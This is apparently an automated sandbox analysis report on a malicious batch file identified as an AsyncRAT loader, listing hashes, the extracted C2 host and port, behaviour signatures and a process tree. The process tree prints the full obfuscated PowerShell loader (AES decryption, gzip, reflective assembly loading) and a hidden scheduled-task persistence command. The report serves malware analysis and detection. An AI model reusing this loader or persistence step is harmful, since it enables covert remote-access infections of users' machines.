Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
18-06-2024 17:46
Static task
static1
Behavioral task
behavioral1
Sample
54M9lg5.bat
Resource
win7-20240419-en
General
-
Target
54M9lg5.bat
-
Size
388KB
-
MD5
31cebd7e588526ab0e13b91877c08665
-
SHA1
52929c1bd8765d5573848494d880bf2484acac12
-
SHA256
fb199c109cc8551b14ce74fc759e7e2430f7f5a57cd410ac8cdb5cb894bbfeb8
-
SHA512
64b35bead23bf5310cd3afb7de4504dc67911ed6e9b9c4a3aaf106505e081657f8da3f3444e6b74c1e9744f9dd1b4646b27c35d05f6af2b7614aecb251a9bf61
-
SSDEEP
12288:yX/PIvkGjjGp/BqbaywxRYCXEP2+oeUwG1GKp:QPIcGjjkEwxRYCX42Thp
Malware Config
Extracted
asyncrat
Default
instruments-toxic.gl.at.ply.gg:14761
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1964-51-0x000001C5F4F40000-0x000001C5F4F56000-memory.dmp family_asyncrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 4616 powershell.exe 1324 powershell.exe 1964 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
svchost.exedescription ioc process File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\V: svchost.exe -
Drops file in System32 directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 3 IoCs
Processes:
svchost.exesvchost.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C00DDF836BDF" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 4616 powershell.exe 4616 powershell.exe 1324 powershell.exe 1324 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4616 powershell.exe Token: SeDebugPrivilege 1324 powershell.exe Token: SeIncreaseQuotaPrivilege 1324 powershell.exe Token: SeSecurityPrivilege 1324 powershell.exe Token: SeTakeOwnershipPrivilege 1324 powershell.exe Token: SeLoadDriverPrivilege 1324 powershell.exe Token: SeSystemProfilePrivilege 1324 powershell.exe Token: SeSystemtimePrivilege 1324 powershell.exe Token: SeProfSingleProcessPrivilege 1324 powershell.exe Token: SeIncBasePriorityPrivilege 1324 powershell.exe Token: SeCreatePagefilePrivilege 1324 powershell.exe Token: SeBackupPrivilege 1324 powershell.exe Token: SeRestorePrivilege 1324 powershell.exe Token: SeShutdownPrivilege 1324 powershell.exe Token: SeDebugPrivilege 1324 powershell.exe Token: SeSystemEnvironmentPrivilege 1324 powershell.exe Token: SeRemoteShutdownPrivilege 1324 powershell.exe Token: SeUndockPrivilege 1324 powershell.exe Token: SeManageVolumePrivilege 1324 powershell.exe Token: 33 1324 powershell.exe Token: 34 1324 powershell.exe Token: 35 1324 powershell.exe Token: 36 1324 powershell.exe Token: SeIncreaseQuotaPrivilege 1324 powershell.exe Token: SeSecurityPrivilege 1324 powershell.exe Token: SeTakeOwnershipPrivilege 1324 powershell.exe Token: SeLoadDriverPrivilege 1324 powershell.exe Token: SeSystemProfilePrivilege 1324 powershell.exe Token: SeSystemtimePrivilege 1324 powershell.exe Token: SeProfSingleProcessPrivilege 1324 powershell.exe Token: SeIncBasePriorityPrivilege 1324 powershell.exe Token: SeCreatePagefilePrivilege 1324 powershell.exe Token: SeBackupPrivilege 1324 powershell.exe Token: SeRestorePrivilege 1324 powershell.exe Token: SeShutdownPrivilege 1324 powershell.exe Token: SeDebugPrivilege 1324 powershell.exe Token: SeSystemEnvironmentPrivilege 1324 powershell.exe Token: SeRemoteShutdownPrivilege 1324 powershell.exe Token: SeUndockPrivilege 1324 powershell.exe Token: SeManageVolumePrivilege 1324 powershell.exe Token: 33 1324 powershell.exe Token: 34 1324 powershell.exe Token: 35 1324 powershell.exe Token: 36 1324 powershell.exe Token: SeIncreaseQuotaPrivilege 1324 powershell.exe Token: SeSecurityPrivilege 1324 powershell.exe Token: SeTakeOwnershipPrivilege 1324 powershell.exe Token: SeLoadDriverPrivilege 1324 powershell.exe Token: SeSystemProfilePrivilege 1324 powershell.exe Token: SeSystemtimePrivilege 1324 powershell.exe Token: SeProfSingleProcessPrivilege 1324 powershell.exe Token: SeIncBasePriorityPrivilege 1324 powershell.exe Token: SeCreatePagefilePrivilege 1324 powershell.exe Token: SeBackupPrivilege 1324 powershell.exe Token: SeRestorePrivilege 1324 powershell.exe Token: SeShutdownPrivilege 1324 powershell.exe Token: SeDebugPrivilege 1324 powershell.exe Token: SeSystemEnvironmentPrivilege 1324 powershell.exe Token: SeRemoteShutdownPrivilege 1324 powershell.exe Token: SeUndockPrivilege 1324 powershell.exe Token: SeManageVolumePrivilege 1324 powershell.exe Token: 33 1324 powershell.exe Token: 34 1324 powershell.exe Token: 35 1324 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
Explorer.EXEpid process 3572 Explorer.EXE 3572 Explorer.EXE 3572 Explorer.EXE -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
Explorer.EXEpid process 3572 Explorer.EXE 3572 Explorer.EXE 3572 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3572 Explorer.EXE -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 4852 wrote to memory of 4692 4852 cmd.exe cmd.exe PID 4852 wrote to memory of 4692 4852 cmd.exe cmd.exe PID 4852 wrote to memory of 4616 4852 cmd.exe powershell.exe PID 4852 wrote to memory of 4616 4852 cmd.exe powershell.exe PID 4616 wrote to memory of 1324 4616 powershell.exe powershell.exe PID 4616 wrote to memory of 1324 4616 powershell.exe powershell.exe PID 4616 wrote to memory of 1496 4616 powershell.exe WScript.exe PID 4616 wrote to memory of 1496 4616 powershell.exe WScript.exe PID 1496 wrote to memory of 4676 1496 WScript.exe cmd.exe PID 1496 wrote to memory of 4676 1496 WScript.exe cmd.exe PID 4676 wrote to memory of 3440 4676 cmd.exe cmd.exe PID 4676 wrote to memory of 3440 4676 cmd.exe cmd.exe PID 4676 wrote to memory of 1964 4676 cmd.exe powershell.exe PID 4676 wrote to memory of 1964 4676 cmd.exe powershell.exe PID 1964 wrote to memory of 3572 1964 powershell.exe Explorer.EXE PID 1964 wrote to memory of 392 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 2752 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 2736 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1548 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1744 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1544 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 952 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1536 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 2716 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1332 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1128 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 532 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 2888 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1112 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 3672 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1700 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 904 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1296 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 2864 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 2268 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 2660 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 956 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1080 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 2064 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 2652 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 4424 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1268 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 2248 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 3428 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1056 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1144 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 2032 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 2024 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 2220 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 3936 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1816 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 2792 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1412 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1608 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1804 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1400 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 2580 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 3560 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 1392 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 796 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 4192 1964 powershell.exe svchost.exe PID 1964 wrote to memory of 3004 1964 powershell.exe svchost.exe
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\54M9lg5.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('f3MdSQvZVMcn6E7f4B+XvVgVp1iwF8nc01VvmvGOU0U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tMZBwLm+KLwTB8FTX+suaA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DtgGd=New-Object System.IO.MemoryStream(,$param_var); $UJAmf=New-Object System.IO.MemoryStream; $NciVC=New-Object System.IO.Compression.GZipStream($DtgGd, [IO.Compression.CompressionMode]::Decompress); $NciVC.CopyTo($UJAmf); $NciVC.Dispose(); $DtgGd.Dispose(); $UJAmf.Dispose(); $UJAmf.ToArray();}function execute_function($param_var,$param2_var){ $QoXwT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GTccN=$QoXwT.EntryPoint; $GTccN.Invoke($null, $param2_var);}$jYuiO = 'C:\Users\Admin\AppData\Local\Temp\54M9lg5.bat';$host.UI.RawUI.WindowTitle = $jYuiO;$gXwGM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jYuiO).Split([Environment]::NewLine);foreach ($LLKpG in $gXwGM) { if ($LLKpG.StartsWith('icuYuBCnSxMVygOBoHMo')) { $vmoAo=$LLKpG.Substring(20); break; }}$payloads_var=[string[]]$vmoAo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_85_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_85.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_85.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_85.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('f3MdSQvZVMcn6E7f4B+XvVgVp1iwF8nc01VvmvGOU0U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tMZBwLm+KLwTB8FTX+suaA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DtgGd=New-Object System.IO.MemoryStream(,$param_var); $UJAmf=New-Object System.IO.MemoryStream; $NciVC=New-Object System.IO.Compression.GZipStream($DtgGd, [IO.Compression.CompressionMode]::Decompress); $NciVC.CopyTo($UJAmf); $NciVC.Dispose(); $DtgGd.Dispose(); $UJAmf.Dispose(); $UJAmf.ToArray();}function execute_function($param_var,$param2_var){ $QoXwT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GTccN=$QoXwT.EntryPoint; $GTccN.Invoke($null, $param2_var);}$jYuiO = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_85.bat';$host.UI.RawUI.WindowTitle = $jYuiO;$gXwGM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jYuiO).Split([Environment]::NewLine);foreach ($LLKpG in $gXwGM) { if ($LLKpG.StartsWith('icuYuBCnSxMVygOBoHMo')) { $vmoAo=$LLKpG.Substring(20); break; }}$payloads_var=[string[]]$vmoAo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
2KB
MD5664dee2ab48c3453aa55cac8ecaa5a44
SHA19211491fa3bfb05ded40ac728c73e05ac7e2aca2
SHA256a5d660246afdd69389db1f961d2d7fa69177d198cdbdc327218fde0ea68a4953
SHA512dbeb4f57093348ec822e29c8cfd7d74ba0d2d7e26e7157f3fda18b2c3f05012513f1c4c06b2e2801429fa1e595e35dd7ba823c95570135f737f87ce3857fc4ff
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gsvoq01k.zxz.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_85.batFilesize
388KB
MD531cebd7e588526ab0e13b91877c08665
SHA152929c1bd8765d5573848494d880bf2484acac12
SHA256fb199c109cc8551b14ce74fc759e7e2430f7f5a57cd410ac8cdb5cb894bbfeb8
SHA51264b35bead23bf5310cd3afb7de4504dc67911ed6e9b9c4a3aaf106505e081657f8da3f3444e6b74c1e9744f9dd1b4646b27c35d05f6af2b7614aecb251a9bf61
-
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_85.vbsFilesize
123B
MD5acd4bfc1a66491a387e68107d632e236
SHA1355c44dc35e9f3bc4405cac3903450068cf96fc1
SHA256408e3bb978e09394758b2eb3e82fb573689408cff85dba43c835bf67859b15ba
SHA5121984ef66e14c0e9ec0d4ceb9392eab4c811f2f7e69c752abee8a7b706365762f22fd6ecb1de8852d91523bd06f77e6504247c65d14e7daeca0a82f24e34a08b0
-
memory/392-60-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/904-108-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/952-107-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/1112-115-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/1296-109-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/1324-32-0x00007FFF7C960000-0x00007FFF7D421000-memory.dmpFilesize
10.8MB
-
memory/1324-29-0x00007FFF7C960000-0x00007FFF7D421000-memory.dmpFilesize
10.8MB
-
memory/1324-19-0x00007FFF7C960000-0x00007FFF7D421000-memory.dmpFilesize
10.8MB
-
memory/1324-18-0x00007FFF7C960000-0x00007FFF7D421000-memory.dmpFilesize
10.8MB
-
memory/1400-114-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/1412-113-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/1536-69-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/1544-68-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/1548-63-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/1744-64-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/1964-51-0x000001C5F4F40000-0x000001C5F4F56000-memory.dmpFilesize
88KB
-
memory/2716-78-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/2736-62-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/2752-61-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/2792-112-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/2864-111-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/3572-53-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/3572-50-0x0000000002DF0000-0x0000000002E1A000-memory.dmpFilesize
168KB
-
memory/3936-110-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmpFilesize
64KB
-
memory/4616-0-0x00007FFF7C963000-0x00007FFF7C965000-memory.dmpFilesize
8KB
-
memory/4616-14-0x000001FEA9F40000-0x000001FEA9FB6000-memory.dmpFilesize
472KB
-
